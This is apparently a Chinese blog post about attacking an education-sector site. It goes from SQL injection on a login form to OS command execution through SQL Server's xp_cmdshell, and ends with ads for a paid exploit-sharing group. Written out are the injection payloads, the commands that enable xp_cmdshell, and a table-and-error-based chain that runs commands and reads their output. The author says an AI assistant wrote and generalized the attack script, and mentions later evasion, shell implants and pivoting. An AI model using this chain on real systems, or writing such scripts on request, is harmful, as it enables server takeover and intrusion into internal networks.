乐于分享
好东西不私藏

AI赋能漏洞挖掘某edusrc从sql注入到getshell

AI赋能漏洞挖掘某edusrc从sql注入到getshell
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
漏洞挖掘
首先通过信息收集拿到这个登录框
这是个ip站点可以通过ip138确定归属
确定是教育网开始挖掘
系统看着就很老,但是这个登录框,又没有验证码,符合我对脆弱资产的认知
手工尝试几个弱口令,没进去
试了几个常见的用户名以及一定不存在的用户回显一致
没有用户名枚举漏洞
加个单引号admin'看看有没有注入
直接连框都不弹了,重点看看接口
先看看相关组件,很安全
看看接口,没几个接口,构造接口的值,手动拼接尝试
直接回显这个页面,确定是asp的站点
一般asp的站点可以搜搜目录,有时候会有/api/help这种类似的接口文档
但是这里没有,只扫描出了几个存在的文件夹
一般文件夹存在就会返回403
这个时候没啥好打的了,看看数据包,尝试弱口令爆破了
这是登录框的一些常见思路
看数据包竟然是加密的,这么老的站点,啧
而且这加密这么长,一看就是rsa
验证一下,一般rsa加密,你输入的内容很长的话,就会报错
合理
既然是rsa加密,顶着rsa爆破弱口令,太低效了
这个时候看看之前的数据包
因为我们之前输入过admin'
当时是没弹窗,但是看数据包,发现竟然有sql注入的感觉
在往下划一下,确定了,就是sql注入的口子
根据会先报错已经确定是sqlserver了
即使没有回显出来,一般asp也会和sqlserver组合
尝试注入,注入的话,不能在数据包里面注入
单引号报错了,大概率就是单引号闭合
直接构造poc在登录框输入然后看回显,利用类型转换失败会回显原始值的特性
admin' AND 1=CONVERT(int, DB_NAME())--+
回到登录框,发现对长度有限制,直接前端修改一下最大长度
然后发包,响应包里面成功看到数据库的名字
查看一下版本
admin' AND 1=CONVERT(int, DB_NAME())--+
查看一下用户
admin' AND 1=CONVERT(int,SYSTEM_USER )--+
额,直接sa权限吗,有点意思,尝试rce
??怎么r
丢给ai试试,rsa加密手动复现太难了
先让他拿下数据库的名字
还有意外收获
ai也感觉到可以r了
直接给出顶级指令,哈哈哈
然后就开始干了,ai时代,美滋滋
几分钟后,依旧核弹级,r了
简单说明一下sqlserver注入rce的原理括弧ai总结版
1. 它到底是什么xp_cmdshell 是 SQL Server 自带的一个扩展存储过程(Extended Stored Procedure),作用只有一个:在运行 SQL Server 的那台 Windows 服务器上,执行操作系统命令。EXEC xp_cmdshell 'whoami'      -- 查看当前身份EXEC xp_cmdshell 'ipconfig'    -- 查看网络EXEC xp_cmdshell 'net user'    -- 查看系统账号它把命令的执行结果以"一张表"的形式返回(列名叫 output,一行一条):output---------------------------nt service\mssqlserver类比:SQL Server 平时只会"读写数据库",xp_cmdshell 相当于给它开了一扇通往操作系统的后门,让你能在数据库里直接敲系统命令。
2. 谁能用?默认开不开?两个关键限制:权限门槛:默认只有 `sysadmin` 角色能执行它。 → 这就是为什么前面拿到连接账号是 `sa` 那么关键——`sa` 是超级管理员,权限门槛直接跨过。默认关闭:从 SQL Server 2005 起,`xp_cmdshell` 默认是禁用的,需要显式打开:-- 先开"显示高级选项"(xp_cmdshell 属于隐藏配置,不先开这个看不到)EXEC sp_configure 'show advanced options'1;RECONFIGURE;-- 再开 xp_cmdshellEXEC sp_configure 'xp_cmdshell'1;RECONFIGURE;查状态:SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';-- value_in_use = 1 表示启用
3. 为什么"SQL 注入 + xp_cmdshell"就是 RCE把两件事接起来看:你有 SQL 注入  ──→  能在数据库里执行任意 SQL连接账号是 sa  ──→  有权限执行 xp_cmdshellxp_cmdshell 开着 ──→  能在操作系统里执行任意命令三段一接,就变成:你在数据库里敲一行 SQL,等于在服务器上敲命令——这就是 RCE(远程代码执行),整台服务器沦陷。关键点:执行命令的不是登录网站的用户,而是 SQL Server 服务账号(`nt service\mssqlserver` 或 `LOCAL SYSTEM` 等)。这个账号通常有很高的系统权限,所以在服务器上"几乎什么事都能干"。
结合本次实战:三步曲为什么长这样① 建表:   '; CREATE TABLE cmd(o varchar(200));-- ② 执行:   '; INSERT cmd EXEC xp_cmdshell 'whoami';-- ③ 回显:   admin' AND 1=CONVERT(int,(SELECT TOP 1 * FROM cmd))-- 逐句拆解:第②步 INSERT cmd EXEC xp_cmdshell 'whoami':EXEC xp_cmdshell 'whoami' 执行命令,返回一个结果集(就是上面那张"表")INSERT INTO cmd ... EXEC 的意思是:把命令返回的结果集直接塞进 cmd 表命令真正在操作系统上跑起来了 → 命令执行发生在这一步为什么需要①和③?这是本案例最容易被绕晕的地方——因为命令的输出我们"看不见":这个站点的数据访问层是 lazy reader,只读取第一个结果集堆叠语句(; 后面的部分)虽然执行了,但它的结果和错误全被丢弃所以 EXEC xp_cmdshell 'whoami' 即使执行成功,我们也看不到 nt service\mssqlserver解决办法:既然输出看不到,就让输出"落地"——① 先建一张表当"收件箱"② 命令输出塞进表③ 用报错注入(CONVERT(int, ...) 转换失败会把值带出来)把表里的内容"捞"出来
5. 用"计时"补刀确认执行为了让"真的执行了命令"这件事有铁证,我们还用了时序验证:sql'; EXEC xp_cmdshell 'ping -n 5 127.0.0.1';-- ping -n 5 会 ping 自己 5 次,大约耗时 4~5 秒。请求响应耗时 4.23s → 证明命令真的被拉起来执行了(单纯查数据库不会等 4 秒)。6. 如果 xp_cmdshell 被禁用了怎么办攻击者还有其他路径(都需要相应权限/功能开启,这也是为什么"全关掉"是防御重点):路径	原理	前置条件sp_oacreate / sp_oamethod	调用 Windows 组件对象(如 WScript.Shell)执行命令	Ole Automation Procedures 开启OPENROWSET	让 SQL 连自己再执行含 xp_cmdshell 的查询	Ad Hoc Distributed Queries 开启SQL Agent 作业	创建作业跑 CmdExec 步骤	SQL Agent 服务运行 + 权限CLR 程序集	加载自定义 .NET 程序集执行
叽里咕噜说了一堆,这个时候脚本小子就懵了,那我要怎么操作?
升级成ai小子即可
给出神的指令
让ai直接搓个脚本出来
拿到脚本,让他升级成通用的,我们指定目标
测试一下脚本
成功执行,查看一下任务
就一个自带的windowsDefender
看看出网情况,貌似不出网
后续做个免杀,上个正向马,就可以打内网了,我们点到为止

后台回复加群加入交流群

广告:cisp pte/pts &nisp1级2级低价报考  

陌笙安全纷传圈子+陌笙src挖掘知识库+陌笙安全漏洞库+陌笙安全面试题库简单介绍加入纷传圈子知识库+漏洞库+面试题库

如果觉得合适可以加入,圈子目前价格39.9元,价格只会根据圈子内容和圈子人数进行上调,不会下跌。。。  

圈子福利 

edu漏洞挖掘1v1指导出洞

skill+grok辅助挖掘某企业src实战效果,能出但是重复多。

陌笙src挖掘知识库介绍(内容持续更新中!!!)

信息收集(主域名信息收集,子域名信息收集等&会永久提供fofa-key助力)弱口令漏洞&未授权访问漏洞挖掘任意文件读取&删除&下载&上传漏洞sql注入漏洞url重定向漏洞csrf&ssrf漏洞挖掘XSS&XXE漏洞挖掘等等常见漏洞cors&目录遍历&越权漏洞挖掘EDUSRC(证书站挖掘案例分享&edusrc挖掘技巧分享)CNVD挖掘技巧分享&实战案例报告编写公益漏洞挖掘(公益src挖掘漏洞分享&提供补天1权重资产)SRC挖掘实战(针对各种常见功能总结的常见测试思路等快速提升)经典常见Nday漏洞(常见中间件&以及各种常见框架)复现云安全相关漏洞挖掘(云key扫盲&云存储桶&快速识别云环境&云攻防)AI相关学习(AI基础&AI代码审计实战测试&webLLM攻击等)APP&小程序漏洞挖掘等各模块不在一一介绍

信息收集

src挖掘基础

src挖掘实战

edusrc

经典nday复现

云安全&AI安全

陌笙安全漏洞库介绍

最新漏洞查看1day&0day分享EDU学校相关漏洞Web应用漏洞CMS漏洞OA产品漏洞中间件漏洞云安全漏洞人工智能漏洞其他漏洞

陌笙安全面试库

渗透测试基本问题一汇总渗透测试基本问题二汇总渗透测试基本问题三汇总微步护网面试题目长亭科技面试深信服护网面试启明星辰渗透测试面试题目安恒面试题目绿盟笔试题目360面试奇安信护网面试运维面试题目运维面试题库网安面试相关文档大全相关面试文章推荐等等

POC库&&更新适配afrog&&nuclei&&dddd的POC&1day/Nday等&&dddd二开工具[助力渗透测试&&红蓝攻防]

工具截图

实战效果

poc库【后续持续更新】

AI赋能-skill辅助漏洞挖掘(免责&&慎用)

圈友skill+ai辅助渗透实战效果,支持打假!

证书站

普通站点

陌笙纷传圈子介

1、src挖掘思维导图,信息收集思维导图,edusrc挖掘思维导图,以及后续的红队&面试思维导图&自己网安笔记等持续更新22025-2026的edusrc实战报告包含证书站和非证书站以及2025之前的各种优质报思路分享3、各种src报告思路分享(内部&外部)4、分享各种src挖掘&edusrc挖掘培训资料&视频5、不定期分享通杀、0day6、有圈子群可以技术交流以及不定期抽取证书&免费rank7.分享各种护网资料各家安全厂商讲解视频&精选实战面试题目8、各种框架漏洞技巧分享9、各种源码分享(泛微、正方系统、用友等)10、漏洞挖掘工具&信息收集工具&内网渗透免杀等网安工具分享11、各种ctf资料以及题目分享12、cnvd挖掘技巧&CNVD资产&src资产分享&补天1权重资产分享&fofakey共用13、免杀、逆向、红队攻内网防渗透等课程分享14、漏洞库&字典以各种内容不在一一说明15、cisp-pte/pts&nisp一级&nisp二级&edusrc证书内部价格15、如果有漏洞挖掘问题或者工具资料需求可以找群主(尽量满足)

目前800多条内容,扫描下方二维码查看详情以及加入圈子,持续更新中。。                          

如果觉得合适可以加入,价格不定期会根据圈子内容和圈子人数进行上调。。